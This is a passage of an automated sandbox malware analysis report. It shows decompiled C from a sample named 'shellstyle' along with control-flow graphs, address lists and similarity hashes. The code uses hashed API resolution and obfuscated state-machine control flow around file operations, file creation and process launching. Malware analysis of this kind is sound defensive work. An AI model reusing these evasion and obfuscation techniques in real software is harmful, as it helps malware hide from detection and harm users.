				void* _t71;
				void* _t72;
				struct _SHFILEOPSTRUCTW* _t73;

				_t70 =  &_v1072;
				_t12 =  *0x3dddc0;
				_t66 = __ecx;
				_t63 = __edx;
				if(_t12 == 0) {
					_t12 = E003D3E60(_t36, E003D3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x3dddc0 = _t12;
				}
				 *_t12( &_v1072, 0, 0x1e);
				_t14 =  *0x3dddc0;
				_t71 = _t70 + 0xc;
				if(_t14 == 0) {
					_t14 = E003D3E60(_t36, E003D3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x3dddc0 = _t14;
				}
				 *_t14( &_v1040, 0, 0x208);
				_t16 =  *0x3dddc0;
				_t72 = _t71 + 0xc;
				if(_t16 == 0) {
					_t16 = E003D3E60(_t36, E003D3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x3dddc0 = _t16;
				}
				 *_t16( &_v520, 0, 0x208);
				_t18 =  *0x3de298;
				_t73 = _t72 + 0xc;
				if(_t18 == 0) {
					_t18 = E003D3E60(_t36, E003D3F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x3de298 = _t18;
				}
				 *_t18( &_v1040, _t66);
				_t20 =  *0x3de298;
				if(_t20 == 0) {
					_t20 = E003D3E60(_t36, E003D3F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x3de298 = _t20;
				}
				 *_t20( &_v528, _t63);
				_v1084 = 1;
				_v1080 =  &_v1056;
				_v1076 =  &_v536;
				_v1072 = 0xe14;
				if( *0x3de30c == 0) {
					 *0x3de30c = E003D3E60(_t36, E003D3F00(0xd9518805), 0x262a6194, _t69);
				}
				_t26 = SHFileOperationW(_t73); // executed
				asm("sbb eax, eax");
				return  ~_t26 + 1;
			}


























                                                                                0x003d3785
                                                                                0x003d3780
                                                                                0x003d378c
                                                                                0x003d378f
                                                                                0x003d3793
                                                                                0x003d37a6
                                                                                0x003d37ab
                                                                                0x003d37ab
                                                                                0x003d37b9
                                                                                0x003d37bb
                                                                                0x003d37c0
                                                                                0x003d37c5
                                                                                0x003d37d8
                                                                                0x003d37dd
                                                                                0x003d37dd
                                                                                0x003d37ee
                                                                                0x003d37f0
                                                                                0x003d37f5
                                                                                0x003d37fa
                                                                                0x003d380d
                                                                                0x003d3812
                                                                                0x003d3812
                                                                                0x003d3826
                                                                                0x003d3828
                                                                                0x003d382d
                                                                                0x003d3832
                                                                                0x003d3845
                                                                                0x003d384a
                                                                                0x003d384a
                                                                                0x003d3855
                                                                                0x003d3857
                                                                                0x003d385e
                                                                                0x003d3871
                                                                                0x003d3876
                                                                                0x003d3876
                                                                                0x003d3884
                                                                                0x003d388a
                                                                                0x003d3892
                                                                                0x003d389d
                                                                                0x003d38a6
                                                                                0x003d38b4
                                                                                0x003d38cc
                                                                                0x003d38cc
                                                                                0x003d38d5
                                                                                0x003d38d9
                                                                                0x003d38e2

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291884694.00000000003D1000.00000020.00000001.sdmp, Offset: 003D0000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2291878567.00000000003D0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291914976.00000000003DD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291932650.00000000003DF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_3d0000_shellstyle.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileOperation
                                                                                • String ID: X~$X~$X~
                                                                                • API String ID: 3080627654-3258893172
                                                                                • Opcode ID: 4a670372ad1a6c7f24d671e9d54203c34da6102a4920f12f9ef5e6f266265aaa
                                                                                • Instruction ID: f9f89261e6002982b20ad2182244749cf8730ead29250f9bde63aa8646a2c6ec
                                                                                • Opcode Fuzzy Hash: 4a670372ad1a6c7f24d671e9d54203c34da6102a4920f12f9ef5e6f266265aaa
                                                                                • Instruction Fuzzy Hash: 6331BE726412454BDB16BB79FC017AB3BEAAB84704F00092EB415CB381EA34DE058792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D80A0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 219fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 343 3d80a0-3d815b 344 3d8163-3d8168 343->344 345 3d8170-3d8175 344->345 346 3d8338-3d833d 345->346 347 3d817b 345->347 350 3d836f-3d8377 346->350 351 3d833f-3d8344 346->351 348 3d8287-3d829b call 3d34c0 347->348 349 3d8181-3d8186 347->349 372 3d829d-3d82b5 call 3d3f00 call 3d3e60 348->372 373 3d82bb-3d82e3 348->373 357 3d818c-3d8191 349->357 358 3d8252-3d8259 349->358 355 3d8379-3d8391 call 3d3f00 call 3d3e60 350->355 356 3d8397-3d83bb CreateFileW 350->356 352 3d8365-3d836a 351->352 353 3d8346-3d834b 351->353 352->345 359 3d834d-3d8352 353->359 360 3d83c7-3d83ce 353->360 355->356 363 3d83bd-3d83c2 356->363 364 3d83ee-3d83fa 356->364 367 3d81e3-3d821a 357->367 368 3d8193-3d8198 357->368 365 3d825b-3d8271 call 3d3f00 call 3d3e60 358->365 366 3d8276-3d8282 358->366 359->345 369 3d8358-3d8364 359->369 376 3d83eb-3d83ec CloseHandle 360->376 377 3d83d0-3d83e6 call 3d3f00 call 3d3e60 360->377 363->345 365->366 366->345 370 3d821c-3d8232 call 3d3f00 call 3d3e60 367->370 371 3d8237-3d824d 367->371 368->359 378 3d819e-3d81e1 call 3db6e0 368->378 370->371 371->345 372->373 397 3d82e5-3d82fb call 3d3f00 call 3d3e60 373->397 398 3d8300-3d830b 373->398 376->364 377->376 378->345 397->398 407 3d830d-3d8323 call 3d3f00 call 3d3e60 398->407 408 3d8328-3d8333 398->408 407->408 408->344
                                                                                C-Code - Quality: 71%
                                                                                			E003D80A0(signed int __edx) {
				short _v524;
				struct _SECURITY_ATTRIBUTES* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				intOrPtr _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* __ebx;
				void* __ebp;
				void* _t58;
				void* _t64;
				void* _t66;
				void* _t73;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t82;
				void* _t83;
				intOrPtr* _t86;
				void* _t88;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t92;
				void* _t96;
				intOrPtr _t101;
				char _t105;
				signed int _t122;
				void* _t125;
				void* _t127;
				void* _t128;
				signed int* _t129;
				void* _t131;

				_t122 = __edx;
				_t129 =  &_v596;
				_v584 = 0x9318;
				_t58 = 0x343bfd89;
				_v584 = _v584 ^ 0xde90c338;
				_v584 = _v584 ^ 0xde905120;
				_v596 = 0x7d19;
				_v596 = _v596 << 9;
				_v596 = _v596 >> 0xe;
				_v596 = _v596 + 0xffff07e5;
				_v596 = _v596 | 0x8aea6eef;
				_v596 = _v596 + 0xd867;
				_v596 = _v596 + 0x9c41;
				_v596 = _v596 + 0x3de0;
				_v596 = _v596 + 0x218b;
				_v596 = _v596 ^ 0x00014403;
				_v592 = 0x2591;
				_t128 = _v584;
				_t96 = 0;
				_v592 = _v592 * 0x7d;
				_v592 = _v592 + 0x8d68;
				_v592 = _v592 + 0xffff8911;
				_v592 = _v592 * 0x6a;
				_v592 = _v592 + 0xffff93d5;
				_v592 = _v592 ^ 0x07a13cd2;
				_v588 = 0x789;
				_v588 = _v588 >> 1;
				_v588 = _v588 ^ 0xaee58af2;
				_v588 = _v588 ^ 0xaee58936;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t131 = _t58 - 0xea5411f;
							if(_t131 > 0) {
								break;
							}
							if(_t131 == 0) {
								_t73 = E003D34C0(0x3dd970);
								_t122 =  *0x3de158;
								_t127 = _t73;
								if(_t122 == 0) {
									_t122 = E003D3E60(_t96, E003D3F00(0xc6fbcd74), 0xba71dd03, _t128);
									 *0x3de158 = _t122;
								}
								_t101 =  *0x3de54c; // 0x5be240
								_t50 = _t101 + 0x260; // 0x5be4a0
								_t51 = _t101 + 0x18; // 0x5be258
								 *_t122( &_v524, 0x104, _t127, _t51, _t50);
								_t78 =  *0x3de494;
								_t129 =  &(_t129[5]);
								if(_t78 == 0) {
									_t83 = E003D3F00(0x9bab0b12);
									_t122 = 0x7facde30;
									_t78 = E003D3E60(_t96, _t83, 0x7facde30, _t128);
									 *0x3de494 = _t78;
								}
								_t125 =  *_t78();
								_t80 =  *0x3ddf30;
								if(_t80 == 0) {
									_t82 = E003D3F00(0x9bab0b12);
									_t122 = 0x5010a54d;
									_t80 = E003D3E60(_t96, _t82, 0x5010a54d, _t128);
									 *0x3ddf30 = _t80;
								}
								 *_t80(_t125, 0, _t127);
								_t58 = 0x2c2d24c8;
								goto L1;
							} else {
								if(_t58 == 0x2f64d8b) {
									_t86 =  *0x3de1d4;
									if(_t86 == 0) {
										_t88 = E003D3F00(0x9bab0b12);
										_t122 = 0xa229df38;
										_t86 = E003D3E60(_t96, _t88, 0xa229df38, _t128);
										 *0x3de1d4 = _t86;
									}
									 *_t86( &_v572);
									_t58 = 0xc5e088d;
									continue;
								} else {
									if(_t58 == 0x6f65414) {
										_t89 = _v568;
										_t105 = _v572;
										_v560 = _t89;
										_v552 = _t89;
										_v544 = _t89;
										_v536 = _t89;
										_t90 =  *0x3ddee4;
										_v564 = _t105;
										_v556 = _t105;
										_v548 = _t105;
										_v540 = _t105;
										_v532 = 0;
										if(_t90 == 0) {
											_t92 = E003D3F00(0x9bab0b12);
											_t122 = 0x4bf45878;
											_t90 = E003D3E60(_t96, _t92, 0x4bf45878, _t128);
											 *0x3ddee4 = _t90;
										}
										 *_t90(_t128, 0,  &_v564, 0x28);
										_t58 = 0x3557bd8c;
										_t96 =  !=  ? 1 : _t96;
										continue;
									} else {
										if(_t58 != 0xc5e088d) {
											goto L24;
										} else {
											_v580 = 0xa8c00;
											_v576 = 0;
											_v596 = E003DB6E0(_v580, _v576, 0x989680, 0);
											_v592 = _t122;
											_v588 = _v588 - _v596;
											_t58 = 0xea5411f;
											asm("sbb [esp+0x2c], ecx");
											continue;
										}
									}
								}
							}
							L35:
						}
						if(_t58 == 0x2c2d24c8) {
							if( *0x3dde04 == 0) {
								_t66 = E003D3F00(0x9bab0b12);
								_t122 = 0xb66d748a;
								 *0x3dde04 = E003D3E60(_t96, _t66, 0xb66d748a, _t128);
							}
							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
							_t128 = _t64;
							if(_t128 == 0xffffffff) {
								goto L34;
							} else {
								_t58 = 0x6f65414;
								goto L2;
							}
						} else {
							if(_t58 == 0x343bfd89) {
								_t58 = 0x2f64d8b;
								goto L2;
							} else {
								if(_t58 == 0x3557bd8c) {
									if( *0x3dde3c == 0) {
										 *0x3dde3c = E003D3E60(_t96, E003D3F00(0x9bab0b12), 0x20de7595, _t128);
									}
									CloseHandle(_t128); // executed
									L34:
									return _t96;
								} else {
									goto L24;
								}
							}
						}
						goto L35;
						L24:
					} while (_t58 != 0xcfe8e);
					return _t96;
					goto L35;
				}
			}













































                                                                                0x003d80a0
                                                                                0x003d80a0
                                                                                0x003d80a6
                                                                                0x003d80ae
                                                                                0x003d80b3
                                                                                0x003d80bb
                                                                                0x003d80c3
                                                                                0x003d80ca
                                                                                0x003d80ce
                                                                                0x003d80d2
                                                                                0x003d80d9
                                                                                0x003d80e0
                                                                                0x003d80e7
                                                                                0x003d80ee
                                                                                0x003d80f5
                                                                                0x003d80fc
                                                                                0x003d8103
                                                                                0x003d8112
                                                                                0x003d8116
                                                                                0x003d8119
                                                                                0x003d811d
                                                                                0x003d8125
                                                                                0x003d8133
                                                                                0x003d8137
                                                                                0x003d813f
                                                                                0x003d8147
                                                                                0x003d814f
                                                                                0x003d8153
                                                                                0x003d815b
                                                                                0x003d8163
                                                                                0x003d8163
                                                                                0x003d8168
                                                                                0x003d8170
                                                                                0x003d8170
                                                                                0x003d8170
                                                                                0x003d8170
                                                                                0x003d8175
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003d817b
                                                                                0x003d828c
                                                                                0x003d8291
                                                                                0x003d8297
                                                                                0x003d829b
                                                                                0x003d82b3
                                                                                0x003d82b5
                                                                                0x003d82b5
                                                                                0x003d82bb
                                                                                0x003d82c1
                                                                                0x003d82c8
                                                                                0x003d82d7
                                                                                0x003d82d9
                                                                                0x003d82de
                                                                                0x003d82e3
                                                                                0x003d82ea
                                                                                0x003d82ef
                                                                                0x003d82f6
                                                                                0x003d82fb
                                                                                0x003d82fb
                                                                                0x003d8302
                                                                                0x003d8304
                                                                                0x003d830b
                                                                                0x003d8312
                                                                                0x003d8317
                                                                                0x003d831e
                                                                                0x003d8323
                                                                                0x003d8323
                                                                                0x003d832c
                                                                                0x003d832e
                                                                                0x00000000
                                                                                0x003d8181
                                                                                0x003d8186
                                                                                0x003d8252
                                                                                0x003d8259
                                                                                0x003d8260
                                                                                0x003d8265
                                                                                0x003d826c
                                                                                0x003d8271
                                                                                0x003d8271
                                                                                0x003d827b
                                                                                0x003d827d
                                                                                0x00000000
                                                                                0x003d818c
                                                                                0x003d8191
                                                                                0x003d81e3
                                                                                0x003d81e7
                                                                                0x003d81eb
                                                                                0x003d81ef
                                                                                0x003d81f3
                                                                                0x003d81f7
                                                                                0x003d81fb
                                                                                0x003d8200
                                                                                0x003d8204
                                                                                0x003d8208
                                                                                0x003d820c
                                                                                0x003d8210
                                                                                0x003d821a
                                                                                0x003d8221
                                                                                0x003d8226
                                                                                0x003d822d
                                                                                0x003d8232
                                                                                0x003d8232
                                                                                0x003d8241
                                                                                0x003d8245
                                                                                0x003d824a
                                                                                0x00000000
                                                                                0x003d8193
                                                                                0x003d8198
                                                                                0x00000000
                                                                                0x003d819e
                                                                                0x003d81a0
                                                                                0x003d81a8
                                                                                0x003d81c4
                                                                                0x003d81c8
                                                                                0x003d81d4
                                                                                0x003d81d8
                                                                                0x003d81dd
                                                                                0x00000000
                                                                                0x003d81dd
                                                                                0x003d8198
                                                                                0x003d8191
                                                                                0x003d8186
                                                                                0x00000000
                                                                                0x003d817b
                                                                                0x003d833d
                                                                                0x003d8377
                                                                                0x003d837e
                                                                                0x003d8383
                                                                                0x003d8391
                                                                                0x003d8391
                                                                                0x003d83b4
                                                                                0x003d83b6
                                                                                0x003d83bb
                                                                                0x00000000
                                                                                0x003d83bd
                                                                                0x003d83bd
                                                                                0x00000000
                                                                                0x003d83bd
                                                                                0x003d833f
                                                                                0x003d8344
                                                                                0x003d8365
                                                                                0x00000000
                                                                                0x003d8346
                                                                                0x003d834b
                                                                                0x003d83ce
                                                                                0x003d83e6
                                                                                0x003d83e6
                                                                                0x003d83ec
                                                                                0x003d83f1
                                                                                0x003d83fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003d834b
                                                                                0x003d8344
                                                                                0x00000000
                                                                                0x003d834d
                                                                                0x003d834d
                                                                                0x003d8364
                                                                                0x00000000
                                                                                0x003d8364

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 003D83B4
                                                                                • CloseHandle.KERNELBASE(?,?,3251FEFE,?,?), ref: 003D83EC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291884694.00000000003D1000.00000020.00000001.sdmp, Offset: 003D0000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2291878567.00000000003D0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291914976.00000000003DD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291932650.00000000003DF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_3d0000_shellstyle.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle
                                                                                • String ID: @[
                                                                                • API String ID: 3498533004-1931288478
                                                                                • Opcode ID: 4956429bcfc67c9acabe13a1c3e5787ed4694731ab3219aeeff37a3aa7e6a94e
                                                                                • Instruction ID: 37631ff57c002d347e3eb6d1a5d7ac581dc84758ee3c9595eb51188fbd9306a4
                                                                                • Opcode Fuzzy Hash: 4956429bcfc67c9acabe13a1c3e5787ed4694731ab3219aeeff37a3aa7e6a94e
                                                                                • Instruction Fuzzy Hash: 4981AF726093018FD71AEF68E84562BB7E9EB94744F00092FF589CB390EB74DD058B52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D4B70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 415 3d4b70-3d4b80 416 3d4b9d-3d4bba 415->416 417 3d4b82-3d4b98 call 3d3f00 call 3d3e60 415->417 421 3d4bbc-3d4bd2 call 3d3f00 call 3d3e60 416->421 422 3d4bd7-3d4bf5 CreateProcessW 416->422 417->416 421->422 425 3d4bf7-3d4bfd 422->425 426 3d4c73-3d4c7a 422->426 429 3d4bff-3d4c13 425->429 430 3d4c14-3d4c1b 425->430 432 3d4c1d-3d4c33 call 3d3f00 call 3d3e60 430->432 433 3d4c38-3d4c45 430->433 432->433 438 3d4c47-3d4c5d call 3d3f00 call 3d3e60 433->438 439 3d4c62-3d4c72 433->439 438->439
                                                                                C-Code - Quality: 60%
                                                                                			E003D4B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
				struct _STARTUPINFOW _v72;
				struct _PROCESS_INFORMATION _v88;
				intOrPtr* _t9;
				int _t12;
				intOrPtr* _t15;
				intOrPtr* _t17;
				WCHAR* _t44;
				WCHAR* _t45;

				_t46 = __ebp;
				_t26 = __ebx;
				_t9 =  *0x3dddc0;
				_t45 = __edx;
				_t44 = __ecx;
				if(_t9 == 0) {
					_t9 = E003D3E60(__ebx, E003D3F00(0xc6fbcd74), 0x7e0ae558, __ebp);
					 *0x3dddc0 = _t9;
				}
				 *_t9( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				if( *0x3de21c == 0) {
					 *0x3de21c = E003D3E60(_t26, E003D3F00(0x9bab0b12), 0xbd6cc871, _t46);
				}
				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
				if(_t12 == 0) {
					return 0;
				} else {
					if(_a12 == 0) {
						_t15 =  *0x3dde3c;
						if(_t15 == 0) {
							_t15 = E003D3E60(_t26, E003D3F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x3dde3c = _t15;
						}
						 *_t15(_v88.hProcess);
						_t17 =  *0x3dde3c;
						if(_t17 == 0) {
							_t17 = E003D3E60(_t26, E003D3F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x3dde3c = _t17;
						}
						 *_t17(_v88.hProcess);
						return 1;
					} else {
						asm("movdqu xmm0, [esp+0x8]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}











                                                                                0x003d4b70
                                                                                0x003d4b70
                                                                                0x003d4b70
                                                                                0x003d4b79
                                                                                0x003d4b7c
                                                                                0x003d4b80
                                                                                0x003d4b93
                                                                                0x003d4b98
                                                                                0x003d4b98
                                                                                0x003d4ba6
                                                                                0x003d4bb0
                                                                                0x003d4bba
                                                                                0x003d4bd2
                                                                                0x003d4bd2
                                                                                0x003d4bf1
                                                                                0x003d4bf5
                                                                                0x003d4c7a
                                                                                0x003d4bf7
                                                                                0x003d4bfd
                                                                                0x003d4c14
                                                                                0x003d4c1b
                                                                                0x003d4c2e
                                                                                0x003d4c33
                                                                                0x003d4c33
                                                                                0x003d4c3c
                                                                                0x003d4c3e
                                                                                0x003d4c45
                                                                                0x003d4c58
                                                                                0x003d4c5d
                                                                                0x003d4c5d
                                                                                0x003d4c66
                                                                                0x003d4c72
                                                                                0x003d4bff
                                                                                0x003d4bff
                                                                                0x003d4c05
                                                                                0x003d4c13
                                                                                0x003d4c13
                                                                                0x003d4bfd

                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 003D4BF1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291884694.00000000003D1000.00000020.00000001.sdmp, Offset: 003D0000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2291878567.00000000003D0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291914976.00000000003DD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291932650.00000000003DF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_3d0000_shellstyle.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID: D$X~
                                                                                • API String ID: 963392458-2090554203
                                                                                • Opcode ID: 07973b8c14efea06c7e8c0afbaf30129d93bf22d54ded34ba2c6d87108783b67
                                                                                • Instruction ID: 749baf81a092ec403184b2e55d4fc03559fb1b4d58a39b9edcc230fde64ee72a
                                                                                • Opcode Fuzzy Hash: 07973b8c14efea06c7e8c0afbaf30129d93bf22d54ded34ba2c6d87108783b67
                                                                                • Instruction Fuzzy Hash: 56219F32B413015BEB16AB7AEC41BAB37AAABD1704F00442EB554CF3A0EA70CD159752
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D30A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 529 3d30a0-3d30b6 530 3d30ba-3d30bf 529->530 531 3d30c0-3d30c5 530->531 532 3d30cb 531->532 533 3d3201-3d3206 531->533 534 3d31ed-3d31f1 532->534 535 3d30d1-3d30d6 532->535 536 3d3208-3d320d 533->536 537 3d3245-3d324c 533->537 540 3d31f7-3d31fc 534->540 541 3d32f6-3d3300 534->541 542 3d30dc-3d30e1 535->542 543 3d31da-3d31e8 535->543 544 3d32ab-3d32b3 536->544 545 3d3213-3d3218 536->545 538 3d324e-3d3264 call 3d3f00 call 3d3e60 537->538 539 3d3269-3d3274 537->539 538->539 564 3d3276-3d328c call 3d3f00 call 3d3e60 539->564 565 3d3291-3d329f RtlAllocateHeap 539->565 540->531 549 3d30e7-3d30ec 542->549 550 3d31a0-3d31a8 542->550 543->531 546 3d32b5-3d32cd call 3d3f00 call 3d3e60 544->546 547 3d32d3-3d32f3 544->547 551 3d322d-3d3232 545->551 552 3d321a-3d3228 call 3d3d00 545->552 546->547 547->541 549->551 556 3d30f2-3d319b 549->556 558 3d31c8-3d31d5 550->558 559 3d31aa-3d31c2 call 3d3f00 call 3d3e60 550->559 551->531 560 3d3238-3d3242 551->560 552->530 556->530 558->530 559->558 564->565 565->541 572 3d32a1-3d32a6 565->572 572->530
                                                                                C-Code - Quality: 71%
                                                                                			E003D30A0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t61;
				intOrPtr* _t62;
				void* _t65;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr _t107;
				intOrPtr* _t116;
				void* _t127;
				void* _t128;
				intOrPtr _t129;
				signed int _t134;
				void* _t135;
				void* _t136;

				_t93 =  *((intOrPtr*)(_t135 + 0xc));
				_t61 = 0x11f367c2;
				_t134 =  *(_t135 + 0x10);
				_t129 =  *((intOrPtr*)(_t135 + 0x14));
				_t127 =  *(_t135 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t136 = _t61 - 0x12466c01;
							if(_t136 > 0) {
								break;
							}
							if(_t136 == 0) {
								if(_t93 !=  *(_t135 + 0x18)) {
									L29:
									return 1;
								} else {
									_t61 = 0x2f21cdd2;
									continue;
								}
							} else {
								if(_t61 == 0x7a26146) {
									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
									continue;
								} else {
									if(_t61 == 0x8928514) {
										_t95 =  *0x3de1cc;
										if(_t95 == 0) {
											_t95 = E003D3E60(_t93, E003D3F00(0x55ab7d30), 0x815a9da3, _t134);
											 *0x3de1cc = _t95;
										}
										_t129 =  *_t95(_t134 + 0x2c);
										_t61 = 0x39d78901;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t61 != 0x11f367c2) {
											goto L18;
										} else {
											 *(_t135 + 0x18) = 0x2e7c;
											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
											 *(_t135 + 0x10) = 0xa461;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
											_t61 = 0x8928514;
											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
											while(1) {
												L1:
												goto L2;
											}
										}
									}
								}
							}
							L30:
						}
						if(_t61 == 0x2f21cdd2) {
							_t62 =  *0x3de494;
							if(_t62 == 0) {
								_t62 = E003D3E60(_t93, E003D3F00(0x9bab0b12), 0x7facde30, _t134);
								 *0x3de494 = _t62;
							}
							_t128 =  *_t62();
							if( *0x3ddd18 == 0) {
								 *0x3ddd18 = E003D3E60(_t93, E003D3F00(0x9bab0b12), 0x9ff0609c, _t134);
							}
							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
							_t127 = _t65;
							if(_t127 == 0) {
								goto L29;
							} else {
								_t61 = 0x35eaa088;
								goto L1;
							}
						} else {
							if(_t61 == 0x35eaa088) {
								_t116 =  *0x3de43c;
								if(_t116 == 0) {
									_t116 = E003D3E60(_t93, E003D3F00(0x9bab0b12), 0x2df4d385, _t134);
									 *0x3de43c = _t116;
								}
								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
								 *(_t107 + 0x1c) = _t127;
								goto L29;
							} else {
								if(_t61 != 0x39d78901) {
									goto L18;
								} else {
									_t93 = E003D3D00(_t129);
									_t61 = 0x7a26146;
									while(1) {
										L1:
										goto L2;
									}
								}
							}
						}
						goto L30;
						L18:
					} while (_t61 != 0x100ad7b4);
					return 1;
					goto L30;
				}
			}



















                                                                                0x003d30a2
                                                                                0x003d30a6
                                                                                0x003d30ac
                                                                                0x003d30b1
                                                                                0x003d30b6
                                                                                0x003d30ba
                                                                                0x003d30ba
                                                                                0x003d30c0
                                                                                0x003d30c0
                                                                                0x003d30c0
                                                                                0x003d30c0
                                                                                0x003d30c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003d30cb
                                                                                0x003d31f1
                                                                                0x003d32f9
                                                                                0x003d3300
                                                                                0x003d31f7
                                                                                0x003d31f7
                                                                                0x00000000
                                                                                0x003d31f7
                                                                                0x003d30d1
                                                                                0x003d30d6
                                                                                0x003d31e5
                                                                                0x00000000
                                                                                0x003d30dc
                                                                                0x003d30e1
                                                                                0x003d31a0
                                                                                0x003d31a8
                                                                                0x003d31c0
                                                                                0x003d31c2
                                                                                0x003d31c2
                                                                                0x003d31ce
                                                                                0x003d31d0
                                                                                0x003d30ba
                                                                                0x003d30ba
                                                                                0x00000000
                                                                                0x003d30ba
                                                                                0x003d30e7
                                                                                0x003d30ec
                                                                                0x00000000
                                                                                0x003d30f2
                                                                                0x003d30f2
                                                                                0x003d310d
                                                                                0x003d3111
                                                                                0x003d311f
                                                                                0x003d3123
                                                                                0x003d3130
                                                                                0x003d3139
                                                                                0x003d3147
                                                                                0x003d314b
                                                                                0x003d3153
                                                                                0x003d315b
                                                                                0x003d3175
                                                                                0x003d317f
                                                                                0x003d3187
                                                                                0x003d318b
                                                                                0x003d3193
                                                                                0x003d30ba
                                                                                0x003d30ba
                                                                                0x00000000
                                                                                0x003d30ba
                                                                                0x003d30ba
                                                                                0x003d30ec
                                                                                0x003d30e1
                                                                                0x003d30d6
                                                                                0x00000000
                                                                                0x003d30cb
                                                                                0x003d3206
                                                                                0x003d3245
                                                                                0x003d324c
                                                                                0x003d325f
                                                                                0x003d3264
                                                                                0x003d3264
                                                                                0x003d326b
                                                                                0x003d3274
                                                                                0x003d328c
                                                                                0x003d328c
                                                                                0x003d3299
                                                                                0x003d329b
                                                                                0x003d329f
                                                                                0x00000000
                                                                                0x003d32a1
